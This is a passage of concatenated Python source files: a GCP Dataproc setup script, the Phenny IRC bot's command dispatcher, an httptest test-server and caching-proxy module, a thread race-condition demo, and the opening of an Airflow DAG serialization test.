        datalab.fab.append_result("Failed to configure reverse proxy.", str(err))
        GCPActions.delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
        sys.exit(1)
if __name__ == "__main__":
    # Per-request log file: /logs/<resource>/<resource>_<project>_<request>.log
    local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
                                               os.environ['request_id'])
    local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
    logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
                        level=logging.INFO,
                        filename=local_log_filepath)
    try:
        # Module-level GCP helpers; also used by configure_dataengine_service().
        GCPMeta = datalab.meta_lib.GCPMeta()
        GCPActions = datalab.actions_lib.GCPActions()
        print('Generating infrastructure names and tags')
        # Build the configuration dictionary entirely from environment
        # variables; names are normalized to lowercase-with-dashes.
        dataproc_conf = dict()
        if 'exploratory_name' in os.environ:
            dataproc_conf['exploratory_name'] = os.environ['exploratory_name'].replace('_', '-').lower()
        else:
            dataproc_conf['exploratory_name'] = ''
        if 'computational_name' in os.environ:
            dataproc_conf['computational_name'] = os.environ['computational_name'].replace('_', '-').lower()
        else:
            dataproc_conf['computational_name'] = ''
        dataproc_conf['service_base_name'] = (os.environ['conf_service_base_name'])
        dataproc_conf['edge_user_name'] = (os.environ['edge_user_name'])
        dataproc_conf['project_name'] = (os.environ['project_name']).replace('_', '-').lower()
        dataproc_conf['endpoint_name'] = (os.environ['endpoint_name']).replace('_', '-').lower()
        dataproc_conf['key_name'] = os.environ['conf_key_name']
        dataproc_conf['key_path'] = '{0}{1}.pem'.format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
        dataproc_conf['region'] = os.environ['gcp_region']
        dataproc_conf['zone'] = os.environ['gcp_zone']
        dataproc_conf['subnet'] = '{0}-{1}-{2}-subnet'.format(dataproc_conf['service_base_name'],
                                                              dataproc_conf['project_name'],
                                                              dataproc_conf['endpoint_name'])
        dataproc_conf['cluster_name'] = '{0}-{1}-{2}-des-{3}'.format(dataproc_conf['service_base_name'],
                                                                     dataproc_conf['project_name'],
                                                                     dataproc_conf['endpoint_name'],
                                                                     dataproc_conf['computational_name'])
        dataproc_conf['cluster_tag'] = '{0}-{1}-{2}-ps'.format(dataproc_conf['service_base_name'],
                                                               dataproc_conf['project_name'],
                                                               dataproc_conf['endpoint_name'])
        dataproc_conf['bucket_name'] = '{0}-{1}-{2}-bucket'.format(dataproc_conf['service_base_name'],
                                                                   dataproc_conf['project_name'],
                                                                   dataproc_conf['endpoint_name'])
        dataproc_conf['release_label'] = os.environ['dataproc_version']
        dataproc_conf['cluster_label'] = {os.environ['notebook_instance_name']: "not-configured"}
        dataproc_conf['dataproc_service_account_name'] = '{0}-{1}-{2}-ps-sa'.format(dataproc_conf['service_base_name'],
                                                                                    dataproc_conf['project_name'],
                                                                                    dataproc_conf['endpoint_name'])
        dataproc_conf['dataproc_unique_index'] = GCPMeta.get_index_by_service_account_name(
            dataproc_conf['dataproc_service_account_name'])
        service_account_email = "{}-{}@{}.iam.gserviceaccount.com".format(dataproc_conf['service_base_name'],
                                                                          dataproc_conf['dataproc_unique_index'],
                                                                          os.environ['gcp_project_id'])
        dataproc_conf['edge_instance_name'] = '{0}-{1}-{2}-edge'.format(dataproc_conf['service_base_name'],
                                                                        dataproc_conf['project_name'],
                                                                        dataproc_conf['endpoint_name'])
        dataproc_conf['edge_instance_hostname'] = GCPMeta.get_instance_public_ip_by_name(
            dataproc_conf['edge_instance_name'])
        dataproc_conf['datalab_ssh_user'] = os.environ['conf_os_user']
        # Dataproc names the master node "<cluster>-m".
        dataproc_conf['master_name'] = dataproc_conf['cluster_name'] + '-m'
        dataproc_conf['master_ip'] = GCPMeta.get_private_ip_address(dataproc_conf['master_name'])
    except Exception as err:
        datalab.fab.append_result("Failed to generate variables dictionary.", str(err))
        GCPActions.delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
        sys.exit(1)
    try:
        res = GCPMeta.get_list_instances(os.environ['gcp_zone'], dataproc_conf['cluster_name'])
        dataproc_conf['cluster_instances'] = [i.get('name') for i in res['items']]
    except Exception as err:
        traceback.print_exc()
        raise Exception
    # Worker ("core") nodes carry "-w-" in their instance names.
    dataproc_conf['cluster_core_instances'] = list()
    for instance in dataproc_conf['cluster_instances']:
        if "{}-w-".format(dataproc_conf['cluster_name']) in instance:
            dataproc_conf['cluster_core_instances'].append(instance)
    try:
        # Configure every cluster node in parallel, one process per node;
        # a nonzero exitcode from any child aborts the whole run.
        jobs = []
        for instance in dataproc_conf['cluster_instances']:
            p = multiprocessing.Process(target=configure_dataengine_service, args=(instance, dataproc_conf))
            jobs.append(p)
            p.start()
        for job in jobs:
            job.join()
        for job in jobs:
            if job.exitcode != 0:
                raise Exception
    except Exception as err:
        GCPActions.delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
        datalab.fab.append_result("Failed to configure Dataengine-service", str(err))
        traceback.print_exc()
        raise Exception
    try:
        dataproc_master_access_url = "https://" + dataproc_conf['edge_instance_hostname'] + "/{}/".format(
            dataproc_conf['exploratory_name'] + '_' + dataproc_conf['computational_name'])
        logging.info('[SUMMARY]')
        print('[SUMMARY]')
        print("Service base name: {}".format(dataproc_conf['service_base_name']))
        print("Cluster name: {}".format(dataproc_conf['cluster_name']))
        print("Key name: {}".format(dataproc_conf['key_name']))
        print("Region: {}".format(dataproc_conf['region']))
        print("Zone: {}".format(dataproc_conf['zone']))
        print("Subnet: {}".format(dataproc_conf['subnet']))
        print("Dataproc version: {}".format(dataproc_conf['release_label']))
        print("Dataproc master node shape: {}".format(os.environ['dataproc_master_instance_type']))
        print("Dataproc slave node shape: {}".format(os.environ['dataproc_slave_instance_type']))
        print("Master count: {}".format(os.environ['dataproc_master_count']))
        print("Slave count: {}".format(os.environ['dataproc_slave_count']))
        print("Preemptible count: {}".format(os.environ['dataproc_preemptible_count']))
        print("Notebook hostname: {}".format(os.environ['notebook_instance_name']))
        print("Bucket name: {}".format(dataproc_conf['bucket_name']))
        # Machine-readable result consumed by the caller of this script.
        with open("/root/result.json", 'w') as result:
            res = {"hostname": dataproc_conf['cluster_name'],
                   "key_name": dataproc_conf['key_name'],
                   "instance_id": dataproc_conf['cluster_name'],
                   "user_own_bucket_name": dataproc_conf['bucket_name'],
                   "Action": "Create new Dataproc cluster",
                   "computational_url": [
                       {"description": "Dataproc Master",
                        "url": dataproc_master_access_url}
                   ]
                   }
            print(json.dumps(res))
            result.write(json.dumps(res))
    except Exception as err:
        datalab.fab.append_result("Error with writing results", str(err))
        GCPActions.delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
        sys.exit(1)
|
bot.py | #!/usr/bin/env python
import sys, os, re, threading, imp
import irc
home = os.getcwd()

def decode(bytes):
    """Decode raw IRC bytes to text, trying UTF-8 first and falling back
    to Latin encodings.

    Note: the parameter intentionally keeps its historical name even
    though it shadows the builtin.
    """
    for encoding in ('utf-8', 'iso-8859-1'):
        try:
            return bytes.decode(encoding)
        except UnicodeDecodeError:
            continue
    # Last resort; iso-8859-1 accepts every byte, so this is rarely reached.
    return bytes.decode('cp1252')
class Phenny(irc.Bot):
    """IRC bot that loads command modules from ./modules and dispatches
    incoming messages to their handler functions.

    NOTE(review): this file is Python 2 (print statements,
    ``except Exception, e``, ``unicode``); documented as-is.
    """
    def __init__(self, config):
        # config supplies nick/name/channels/password plus optional module
        # selection attributes (enable/exclude/extra) consumed by setup().
        args = (config.nick, config.name, config.channels, config.password)
        irc.Bot.__init__(self, *args)
        self.config = config
        self.doc = {}    # command name -> (docstring, example) for help output
        self.stats = {}  # (command name, source) -> invocation count
        self.setup()
    def setup(self):
        """Discover module files, import them, and bind their commands."""
        self.variables = {}
        filenames = []
        if not hasattr(self.config, 'enable'):
            # No whitelist: load every non-private .py under ./modules.
            for fn in os.listdir(os.path.join(home, 'modules')):
                if fn.endswith('.py') and not fn.startswith('_'):
                    filenames.append(os.path.join(home, 'modules', fn))
        else:
            for fn in self.config.enable:
                filenames.append(os.path.join(home, 'modules', fn + '.py'))
        if hasattr(self.config, 'extra'):
            # 'extra' entries may be single files or whole directories.
            for fn in self.config.extra:
                if os.path.isfile(fn):
                    filenames.append(fn)
                elif os.path.isdir(fn):
                    for n in os.listdir(fn):
                        if n.endswith('.py') and not n.startswith('_'):
                            filenames.append(os.path.join(fn, n))
        modules = []
        excluded_modules = getattr(self.config, 'exclude', [])
        for filename in filenames:
            name = os.path.basename(filename)[:-3]
            if name in excluded_modules: continue
            # if name in sys.modules:
            #     del sys.modules[name]
            try: module = imp.load_source(name, filename)
            except Exception, e:
                print >> sys.stderr, "Error loading %s: %s (in bot.py)" % (name, e)
            else:
                # A module may define setup(bot) for one-time initialisation.
                if hasattr(module, 'setup'):
                    module.setup(self)
                self.register(vars(module))
                modules.append(name)
        if modules:
            print >> sys.stderr, 'Registered modules:', ', '.join(modules)
        else: print >> sys.stderr, "Warning: Couldn't find any modules"
        self.bind_commands()
    def register(self, variables):
        """Record every module member that declares 'commands' or 'rule'."""
        # This is used by reload.py, hence it being methodised
        for name, obj in variables.iteritems():
            if hasattr(obj, 'commands') or hasattr(obj, 'rule'):
                self.variables[name] = obj
    def bind_commands(self):
        """Compile each registered handler's patterns into self.commands,
        keyed by priority ('high'/'medium'/'low')."""
        self.commands = {'high': {}, 'medium': {}, 'low': {}}
        def bind(self, priority, regexp, func):
            print priority, regexp.pattern.encode('utf-8'), func
            # register documentation
            if not hasattr(func, 'name'):
                func.name = func.__name__
            if func.__doc__:
                if hasattr(func, 'example'):
                    example = func.example
                    example = example.replace('$nickname', self.nick)
                else: example = None
                self.doc[func.name] = (func.__doc__, example)
            self.commands[priority].setdefault(regexp, []).append(func)
        def sub(pattern, self=self):
            # These replacements have significant order
            pattern = pattern.replace('$nickname', re.escape(self.nick))
            return pattern.replace('$nick', r'%s[,:] +' % re.escape(self.nick))
        for name, func in self.variables.iteritems():
            # print name, func
            # Fill in per-handler defaults before binding.
            if not hasattr(func, 'priority'):
                func.priority = 'medium'
            if not hasattr(func, 'thread'):
                func.thread = True
            if not hasattr(func, 'event'):
                func.event = 'PRIVMSG'
            else: func.event = func.event.upper()
            if hasattr(func, 'rule'):
                if isinstance(func.rule, str):
                    pattern = sub(func.rule)
                    regexp = re.compile(pattern)
                    bind(self, func.priority, regexp, func)
                if isinstance(func.rule, tuple):
                    # 1) e.g. ('$nick', '(.*)')
                    if len(func.rule) == 2 and isinstance(func.rule[0], str):
                        prefix, pattern = func.rule
                        prefix = sub(prefix)
                        regexp = re.compile(prefix + pattern)
                        bind(self, func.priority, regexp, func)
                    # 2) e.g. (['p', 'q'], '(.*)')
                    elif len(func.rule) == 2 and isinstance(func.rule[0], list):
                        prefix = self.config.prefix
                        commands, pattern = func.rule
                        for command in commands:
                            command = r'(%s)\b(?: +(?:%s))?' % (command, pattern)
                            regexp = re.compile(prefix + command)
                            bind(self, func.priority, regexp, func)
                    # 3) e.g. ('$nick', ['p', 'q'], '(.*)')
                    elif len(func.rule) == 3:
                        prefix, commands, pattern = func.rule
                        prefix = sub(prefix)
                        for command in commands:
                            command = r'(%s) +' % command
                            regexp = re.compile(prefix + command + pattern)
                            bind(self, func.priority, regexp, func)
            if hasattr(func, 'commands'):
                for command in func.commands:
                    template = r'^%s(%s)(?: +(.*))?$'
                    pattern = template % (self.config.prefix, command)
                    regexp = re.compile(pattern)
                    bind(self, func.priority, regexp, func)
    def wrapped(self, origin, text, match):
        """Return a proxy bot whose reply()/say() target the message origin."""
        class PhennyWrapper(object):
            def __init__(self, phenny):
                self.bot = phenny
            def __getattr__(self, attr):
                sender = origin.sender or text
                if attr == 'reply':
                    return (lambda msg:
                        self.bot.msg(sender, origin.nick + ': ' + msg))
                elif attr == 'say':
                    return lambda msg: self.bot.msg(sender, msg)
                return getattr(self.bot, attr)
        return PhennyWrapper(self)
    def input(self, origin, text, bytes, match, event, args):
        """Build the unicode subclass (CommandInput) handed to handlers,
        carrying the match, origin and permission flags as attributes."""
        class CommandInput(unicode):
            def __new__(cls, text, origin, bytes, match, event, args):
                s = unicode.__new__(cls, text)
                s.sender = origin.sender
                s.nick = origin.nick
                s.event = event
                s.bytes = bytes
                s.match = match
                s.group = match.group
                s.groups = match.groups
                s.args = args
                s.admin = origin.nick in self.config.admins
                s.owner = origin.nick == self.config.owner
                return s
        return CommandInput(text, origin, bytes, match, event, args)
    def call(self, func, origin, phenny, input):
        """Invoke a handler, reporting (not propagating) any exception."""
        try: func(phenny, input)
        except Exception, e:
            self.error(origin)
    def limit(self, origin, func):
        """Return True when the channel's 'limit' config excludes the
        handler's module from this channel."""
        if origin.sender and origin.sender.startswith('#'):
            if hasattr(self.config, 'limit'):
                limits = self.config.limit.get(origin.sender)
                if limits and (func.__module__ not in limits):
                    return True
        return False
    def dispatch(self, origin, args):
        """Match an incoming line against all bound patterns and run the
        matching handlers, threaded or inline per their 'thread' flag."""
        bytes, event, args = args[0], args[1], args[2:]
        text = decode(bytes)
        for priority in ('high', 'medium', 'low'):
            items = self.commands[priority].items()
            for regexp, funcs in items:
                for func in funcs:
                    if event != func.event and func.event != '*': continue
                    match = regexp.match(text)
                    if match:
                        if self.limit(origin, func): continue
                        phenny = self.wrapped(origin, text, match)
                        input = self.input(origin, text, bytes, match, event, args)
                        if func.thread:
                            targs = (func, origin, phenny, input)
                            t = threading.Thread(target=self.call, args=targs)
                            t.start()
                        else: self.call(func, origin, phenny, input)
                        # Track usage per (command, channel) and (command, nick).
                        for source in [origin.sender, origin.nick]:
                            try: self.stats[(func.name, source)] += 1
                            except KeyError:
                                self.stats[(func.name, source)] = 1
if __name__ == '__main__':
    # Running the module directly just prints its docstring (Python 2 print).
    print __doc__
|
httptest.py | #!/usr/bin/env python3
'''
httptest offers the Handler for serving test data and the HTTPServer
which is started and stopped using the httptest.Server() decorator.
'''
import os
import io
import json
import hashlib
import inspect
import selectors
import threading
import http.server
import urllib.request
import multiprocessing
from urllib.parse import urlparse, urljoin
from contextlib import contextmanager
# Compatibility shim: http.server.ThreadingHTTPServer was added in
# Python 3.7; on older versions compose an equivalent class from
# socketserver.ThreadingMixIn + HTTPServer.
if getattr(http.server, 'ThreadingHTTPServer', False):
    ThreadingHTTPServer = http.server.ThreadingHTTPServer
else:
    import socketserver
    class ThreadingHTTPServer(socketserver.ThreadingMixIn,
                              http.server.HTTPServer):
        pass
class FailedToStart(Exception):
    '''
    Raised when the server could not be started, so a NoServer instance
    was created instead.
    '''
class AlreadyStarted(Exception):
    '''
    Raised when starting the server is impossible because it is already
    running.
    '''
class NotStarted(Exception):
    '''
    Raised when stopping the server is impossible because it is not
    running.
    '''
class Handler(http.server.SimpleHTTPRequestHandler):
    '''
    Request handler meant to be paired with httptest.Server.
    '''

    def json(self, data):
        '''
        Respond with HTTP 200 and *data* serialized as
        Content-type application/json.
        '''
        payload = json.dumps(data).encode('utf-8')
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(payload)

    #pylint: disable=arguments-differ
    def log_message(self, *args):
        '''
        Silence the default per-request logging.
        '''
class CachingProxyHandler(Handler):
    '''
    Handler to use with httptest.Server which caches requests to an upstream
    server.

    Responses are cached on disk under STATE_DIR as four files per request
    key: <key>.status, <key>.headers, <key>.body and <key>.hits.
    '''
    @classmethod
    def to(cls, upstream, state_dir=None):
        '''
        Creates a CachingProxyHandler subclass which will proxy requests to
        the given *upstream* URL, caching under *state_dir* (defaults to
        ./.cache/httptest).
        '''
        if state_dir is None:
            state_dir = os.path.join(os.getcwd(), '.cache', 'httptest')
        upstream = urlparse(upstream)
        class ConfiguredCachingProxyHandler(cls):
            UPSTREAM = upstream
            STATE_DIR = state_dir
        return ConfiguredCachingProxyHandler
    def proxied_url(self):
        # Rebuild the upstream URL for this request path, collapsing any
        # duplicate slashes and then restoring the scheme's '://'.
        url = self.UPSTREAM.geturl() + self.path
        while '//' in url:
            url = url.replace('//', '/')
        return url.replace(':/', '://')
    def cache_path(self, *args):
        # Ensure the cache directory exists, then join *args* onto it.
        if not os.path.isdir(self.STATE_DIR):
            os.makedirs(self.STATE_DIR)
        return os.path.join(self.STATE_DIR, *args)
    def cached(self, key):
        # A response counts as cached only when all three artifacts exist.
        return bool(all(list(map(lambda needed: \
                os.path.isfile(self.cache_path(key + needed)),
                ['.status', '.headers', '.body']))))
    def cache_key(self):
        # Cache key: SHA-384 over the request line, the sorted headers and
        # (when present) the request body. Returns (hexdigest, body-or-None).
        body = None
        if 'Content-Length' in self.headers:
            length = int(self.headers['Content-Length'])
            body = io.BytesIO(self.rfile.read(length))
        digest = hashlib.sha384()
        digest.update(self.requestline.encode('utf-8', errors='ignore'))
        def sort_headers(kv):
            '''
            Sort headers dict so it always is in the same order.
            '''
            return kv[0].lower()
        for k, v in sorted(self.headers.items(), key=sort_headers):
            digest.update(k.encode('utf-8', errors='ignore'))
            digest.update(v.encode('utf-8', errors='ignore'))
        if body is not None:
            digest.update(body.read())
            body.seek(0)  # rewind so the body can be forwarded upstream
        return digest.hexdigest(), body
    @contextmanager
    def save_cache(self, key, status, headers, body):
        # Persist status/headers/body under *key*, then yield a fresh
        # readable handle on the cached body.
        with open(self.cache_path(key + '.hits'), 'w') as fd:
            fd.write(str(0))
        with open(self.cache_path(key + '.status'), 'w') as fd:
            fd.write(str(status))
        with open(self.cache_path(key + '.headers'), 'w') as fd:
            json.dump(dict(headers._headers), fd)
        with open(self.cache_path(key + '.body'), 'wb') as fd:
            fd.write(body.read())
        with open(self.cache_path(key + '.body'), 'rb') as fd:
            yield fd
    @contextmanager
    def load_cache(self, key):
        # Bump the hit counter (when present), then yield
        # (status, headers, open body handle).
        if os.path.exists(self.cache_path(key + '.hits')):
            with open(self.cache_path(key + '.hits'), 'r') as fd:
                hits = int(fd.read())
            with open(self.cache_path(key + '.hits'), 'w') as fd:
                fd.write(str(hits + 1))
        with open(self.cache_path(key + '.status'), 'r') as fd:
            status = int(fd.read())
        with open(self.cache_path(key + '.headers'), 'r') as fd:
            headers = json.load(fd)
        with open(self.cache_path(key + '.body'), 'rb') as fd:
            yield status, headers, fd
    def do_forward(self):
        '''
        Forward the request by making a similar request with urllib,
        serving from the on-disk cache when possible.
        '''
        self.headers.replace_header('Host', self.UPSTREAM.netloc)
        key, data = self.cache_key()
        if self.cached(key):
            # Load from cache
            if data is not None:
                data.close()
            with self.load_cache(key) as (status, headers, fd):
                self.send_response(status)
                for header, content in headers.items():
                    self.send_header(header, content)
                self.end_headers()
                try:
                    self.wfile.write(fd.read())
                except BrokenPipeError:
                    pass  # client hung up; nothing to do
        else:
            # Run request (not cached)
            req = urllib.request.Request(self.proxied_url(),
                                         headers=self.headers,
                                         data=data,
                                         method=self.command)
            try:
                with urllib.request.urlopen(req) as f:
                    self.send_response(f.status)
                    for header, content in f.headers.items():
                        self.send_header(header, content)
                    self.end_headers()
                    with self.save_cache(key, f.status, f.headers, f) as c:
                        try:
                            self.wfile.write(c.read())
                        except BrokenPipeError:
                            pass
            except urllib.error.HTTPError as e:
                # Error responses are relayed to the client but not cached.
                self.send_response(e.status, message=e.reason)
                for header, content in e.headers.items():
                    self.send_header(header, content)
                self.end_headers()
                try:
                    self.wfile.write(e.read())
                except BrokenPipeError:
                    pass
# Make sure CachingProxyHandler responds to all HTTP methods: every verb is
# routed through the caching forwarder by aliasing do_<METHOD> to do_forward.
for method in 'GET HEAD POST PUT DELETE CONNECT OPTIONS TRACE PATCH'.split():
    setattr(CachingProxyHandler, 'do_' + method, CachingProxyHandler.do_forward)
class HTTPServer(ThreadingHTTPServer):
    '''
    Starts and manages the running server process.

    The server runs in a background thread; a multiprocessing Pipe is used
    as the shutdown signal (its read end becoming readable stops the loop).
    '''
    allow_reuse_address = True
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # __server: background Thread while running, False otherwise.
        # __send: write end of the shutdown Pipe while running, False otherwise.
        self.__server = False
        self.__send = False
    #pylint: disable=arguments-differ
    def serve_forever(self, addr_queue, pipe):
        '''
        Start the server handle requests and wait for shutdown.
        The bound server name and port are reported through *addr_queue*;
        *pipe* becoming readable is the shutdown signal.
        '''
        addr_queue.put(self.server_name)
        addr_queue.put(self.server_port)
        with selectors.DefaultSelector() as selector:
            # Wait on both the listening socket and the shutdown pipe.
            selector.register(self, selectors.EVENT_READ)
            selector.register(pipe, selectors.EVENT_READ)
            while True:
                ready = selector.select()
                for i in ready:
                    if i[0].fd != self.fileno():
                        # Shutdown pipe is readable: close the socket and exit.
                        return self.socket.close()
                    self._handle_request_noblock()
    def start_background(self):
        '''
        Start the server in the background. Call stop_background to
        stop it. Raises AlreadyStarted if called again before
        stop_background is called. Returns the server hostname and
        port as a tuple.
        '''
        if self.__server is not False or self.__send is not False:
            raise AlreadyStarted()
        addr_queue = multiprocessing.Queue()
        recv, self.__send = multiprocessing.Pipe()
        self.__server = threading.Thread(target=self.serve_forever, args=(addr_queue, recv))
        self.__server.start()
        # Block until serve_forever reports the address it actually bound.
        return addr_queue.get(True), addr_queue.get(True)
    def stop_background(self):
        '''
        Stop a running server. Raises NotStarted if called before
        start_background.
        '''
        if not self.__server or not self.__send:
            raise NotStarted()
        self.__send.send('shutdown')
        self.__server = False
        self.__send = False
class NoServer(object):
    '''
    Placeholder used as the default value of the test server (``ts``)
    argument of a test case.
    Example:
        def test_something(self, ts=httptest.NoServer()):
    '''

    def url(self):
        '''
        Always raises FailedToStart, since no server is running.
        '''
        raise FailedToStart()
class Server(object):
    '''
    Server is the decorator used on unittest methods.
    Example:
        class TestJSONServer(httptest.Handler):
            def do_GET(self):
                self.json([2, 4])
        class TestHandlerMethods(unittest.TestCase):
            @httptest.Server(TestJSONServer)
            def test_json(self, ts=httptest.NoServer()):
                with urllib.request.urlopen(ts.url()) as f:
                    self.assertEqual(f.read().decode("utf-8"), "[2, 4]")
    '''

    def __init__(self, testServerClass, addr=('127.0.0.1', 0)):
        # Handler class to serve with, and the address to bind; port 0
        # asks the OS for a free port (filled in once the server starts).
        self._class = testServerClass
        self._addr = addr
        self.server_name = addr[0]
        self.server_port = addr[1]

    def _start(self):
        '''
        Create and start the HTTPServer, recording its bound address.
        Returns the server so the caller can stop it.
        '''
        server = HTTPServer(self._addr, self._class)
        self.server_name, self.server_port = server.start_background()
        return server

    def __call__(self, func, *args, **kwargs):
        '''
        Starts the HTTPServer, runs the test, then stops the server.
        Works for both regular and coroutine test functions; try/finally
        guarantees shutdown whether the test passes or raises.
        '''
        if inspect.iscoroutinefunction(func):
            async def wrap(*args, **kwargs):
                server = self._start()
                try:
                    return await func(*args, ts=self, **kwargs)
                finally:
                    server.stop_background()
            return wrap

        def wrap(*args, **kwargs):
            server = self._start()
            try:
                return func(*args, ts=self, **kwargs)
            finally:
                server.stop_background()
        return wrap

    def url(self):
        '''
        Server URL formatted as http://server_name:server_port/
        '''
        return 'http://{0}:{1}/'.format(self.server_name, self.server_port)
|
mul_questiion.py | import threading
count = 0
# Bump the shared module-level counter one million times; run concurrently
# by two threads in the script body below.
def count_fun():
    """Increment the global ``count`` 1,000,000 times.

    NOTE(review): ``count += 1`` is a read-modify-write and is not atomic
    across threads, so concurrent callers can lose updates -- presumably
    this script exists to demonstrate exactly that race; confirm before
    adding a lock.
    """
    global count
    for _ in range(1000000):
        count += 1
# Launch two threads that each increment the shared counter, wait for both,
# then print the final (possibly racy) total.
threading_list = []
t1 = threading.Thread(target=count_fun)
t2 = threading.Thread(target=count_fun)
threading_list.append(t1)
threading_list.append(t2)
list(map(lambda x: x.start(), threading_list))  # start both workers
list(map(lambda t: t.join(), threading_list))   # block until both finish
print(f"主线程运行结束。count is : {count}")
|
test_dag_serialization.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
# Kubernetes pod used as the executor_config pod_override of the simple
# DAG's bash task; its serialized form appears in the ground truth below.
executor_config_pod = k8s.V1Pod(
    metadata=k8s.V1ObjectMeta(name="my-name"),
    spec=k8s.V1PodSpec(
        containers=[
            k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
        ]
    ),
)
# Expected SerializedDAG.to_dict() output for make_simple_dag(); compared
# field-by-field in validate_serialized_dag().
serialized_simple_dag_ground_truth = {
    "__version": 1,
    "dag": {
        "default_args": {
            "__type": "dict",
            "__var": {
                "depends_on_past": False,
                "retries": 1,
                "retry_delay": {"__type": "timedelta", "__var": 300.0},
                "max_retry_delay": {"__type": "timedelta", "__var": 600.0},
                "sla": {"__type": "timedelta", "__var": 100.0},
            },
        },
        "start_date": 1564617600.0,
        '_task_group': {
            '_group_id': None,
            'prefix_group_id': True,
            'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
            'tooltip': '',
            'ui_color': 'CornflowerBlue',
            'ui_fgcolor': '#000',
            'upstream_group_ids': [],
            'downstream_group_ids': [],
            'upstream_task_ids': [],
            'downstream_task_ids': [],
        },
        "is_paused_upon_creation": False,
        "_dag_id": "simple_dag",
        "doc_md": "### DAG Tutorial Documentation",
        # fileloc is machine-dependent; the test nulls it before comparing.
        "fileloc": None,
        "tasks": [
            {
                "task_id": "bash_task",
                "owner": "airflow",
                "retries": 1,
                "retry_delay": 300.0,
                "max_retry_delay": 600.0,
                "sla": 100.0,
                "_downstream_task_ids": [],
                "_inlets": [],
                "_is_dummy": False,
                "_outlets": [],
                "ui_color": "#f0ede4",
                "ui_fgcolor": "#000",
                "template_fields": ['bash_command', 'env'],
                "template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
                "bash_command": "echo {{ task.task_id }}",
                'label': 'bash_task',
                "_task_type": "BashOperator",
                "_task_module": "airflow.operators.bash",
                "pool": "default_pool",
                "executor_config": {
                    '__type': 'dict',
                    '__var': {
                        "pod_override": {
                            '__type': 'k8s.V1Pod',
                            '__var': PodGenerator.serialize_pod(executor_config_pod),
                        }
                    },
                },
                "doc_md": "### Task Tutorial Documentation",
            },
            {
                "task_id": "custom_task",
                "retries": 1,
                "retry_delay": 300.0,
                "max_retry_delay": 600.0,
                "sla": 100.0,
                "_downstream_task_ids": [],
                "_inlets": [],
                "_is_dummy": False,
                "_outlets": [],
                "_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
                "ui_color": "#fff",
                "ui_fgcolor": "#000",
                "template_fields": ['bash_command'],
                "template_fields_renderers": {},
                "_task_type": "CustomOperator",
                "_task_module": "tests.test_utils.mock_operators",
                "pool": "default_pool",
                'label': 'custom_task',
            },
        ],
        "timezone": "UTC",
        "_access_control": {
            "__type": "dict",
            "__var": {
                "test_role": {
                    "__type": "set",
                    "__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
                }
            },
        },
    },
}
# Repository root (two levels above this test file); used to glob for
# example DAG folders in collect_dags().
ROOT_FOLDER = os.path.realpath(
    os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
    """Load the DAGs found under *module_path* and return them as a dict."""
    return DagBag(module_path).dags
def make_simple_dag():
    """Make very simple DAG to verify serialization result.

    Returns a {dag_id: DAG} mapping whose serialized form is expected to
    match ``serialized_simple_dag_ground_truth`` exactly.
    """
    with DAG(
        dag_id='simple_dag',
        default_args={
            "retries": 1,
            "retry_delay": timedelta(minutes=5),
            "max_retry_delay": timedelta(minutes=10),
            "depends_on_past": False,
            "sla": timedelta(seconds=100),
        },
        start_date=datetime(2019, 8, 1),
        is_paused_upon_creation=False,
        access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
        doc_md="### DAG Tutorial Documentation",
    ) as dag:
        CustomOperator(task_id='custom_task')
        BashOperator(
            task_id='bash_task',
            bash_command='echo {{ task.task_id }}',
            owner='airflow',
            executor_config={"pod_override": executor_config_pod},
            doc_md="### Task Tutorial Documentation",
        )
        return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
    """Make DAGs with user defined macros and filters using locally defined methods.
    For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
    The examples here test:
        (1) functions can be successfully displayed on UI;
        (2) templates with function macros have been rendered before serialization.

    Returns a {dag_id: DAG} mapping.
    """
    def compute_next_execution_date(dag, execution_date):
        # Locally defined macro; not serializable, hence excluded for Webserver.
        return dag.following_schedule(execution_date)

    default_args = {'start_date': datetime(2019, 7, 10)}
    dag = DAG(
        'user_defined_macro_filter_dag',
        default_args=default_args,
        user_defined_macros={
